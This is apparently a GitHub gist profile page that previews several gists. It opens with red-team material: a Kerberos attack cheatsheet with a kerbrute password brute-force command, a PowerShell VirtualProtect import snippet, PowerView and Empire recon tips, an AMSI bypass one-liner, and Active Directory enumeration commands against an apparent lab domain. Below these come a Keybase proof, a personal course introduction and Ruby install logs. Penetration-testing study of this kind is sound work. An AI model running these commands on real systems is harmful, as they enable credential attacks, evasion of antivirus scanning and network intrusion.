@reybango
reybango / kerberos_attacks_cheatsheet.md
Created March 5, 2024 04:10 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reybango
reybango / gist:e3f979bb0ab4f93e5c60a9b6bc81849f
Created September 8, 2021 20:51
Type Accelerator Alias
$MethodDefinition = "
[DllImport(`"kernel32`")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport(`"kernel32`")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport(`"kernel32`")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
@reybango
reybango / PowerView-3.0-tricks.ps1
Created April 9, 2021 01:06 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
# Import a script into the legacy Empire CLI
scriptimport ./data/module_source/situational_awareness/network/powerview.ps1
Then you can execute the commands with scriptcmd
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# AMSI Bypass (Matt Graeber)
Normal Version
------------------------
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Get all user objects in the specific domain and only print the AD username
get-netuser -domain throwback.local -domaincontroller 10.200.14.117 | select samaccountname
# Get all computer objects in the specific domain
get-netcomputer -domain throwback.local -domaincontroller 10.200.14.117
# Get all domain trusts
Get-NetDomainTrust -domain throwback.local -domaincontroller 10.200.14.117

Keybase proof

I hereby claim:

  • I am reybango on github.
  • I am reybango (https://keybase.io/reybango) on keybase.
  • I have a public key whose fingerprint is 3EB4 B311 8F42 7223 B9B0 EAB8 5E40 0313 D8F5 A86D

To claim this, I am signing this object:

@reybango
reybango / gist:5999755
Last active December 19, 2015 18:38
Bloc.io Intro

Intro time!

Hey all, my name is Rey Bango. Note it's spelled with an "e" since it's short for Reinaldo. I always go with Rey since everyone has a hard time pronouncing my full name. :)

I'm a developer evangelist at Microsoft focused on web development and Internet Explorer. I've been developing professionally for about 24 years in a variety of systems both non-web & web-based. I cut my chops on the web using ColdFusion several years ago and then shifted to client-side development where I eventually became part of the jQuery project team.

My main interest in this course is to get back into server-side development using a modern stack so I can round out my skills again. And hopefully the client-side stuff will be a nice refresher for me.

I'm also the dad to 5 kids and have a loving wife. :)

@reybango
reybango / gist:5205320
Created March 20, 2013 14:57
rvm install 1.9.3
Reys-MacBook-Air:~ rey$ rvm install 1.9.3
Searching for binary rubies, this might take some time.
No binary rubies available for: osx/10.8/x86_64/ruby-1.9.3-p392.
Continuing with compilation. Please read 'rvm mount' to get more information on binary rubies.
Installing requirements for osx/10.8/x86_64, might require sudo password
Skipping `brew update` make sure your formulas are up to date.
Skipping update of certificates in '/usr/local/etc/openssl/cert.pem'.
Installing Ruby from source to: /Users/rey/.rvm/rubies/ruby-1.9.3-p392, this may take a while depending on your cpu(s)...
ruby-1.9.3-p392 - #downloading ruby-1.9.3-p392, this may take a while depending on your connection...
ruby-1.9.3-p392 - #extracting ruby-1.9.3-p392 to /Users/rey/.rvm/src/ruby-1.9.3-p392
@reybango
reybango / gist:5204957
Created March 20, 2013 14:13
rvm install 1.9.3 --debug
Reys-MacBook-Air:~ rey$ rvm install 1.9.3 --debug
1.9.3 - install
Searching for binary rubies, this might take some time.
Remote file does not exist https://rvm.io/binaries/osx/10.8/x86_64/ruby-1.9.3-p392.tar.bz2
Remote file does not exist http://jruby.org.s3.amazonaws.com/downloads/ruby-1.9.3-p392.tar.bz2
Remote file does not exist http://binaries.rubini.us/osx/10.8/x86_64/ruby-1.9.3-p392.tar.bz2
rvm_remote_server_url3 not found
No remote file name found
No binary rubies available for: osx/10.8/x86_64/ruby-1.9.3-p392.
Continuing with compilation. Please read 'rvm mount' to get more information on binary rubies.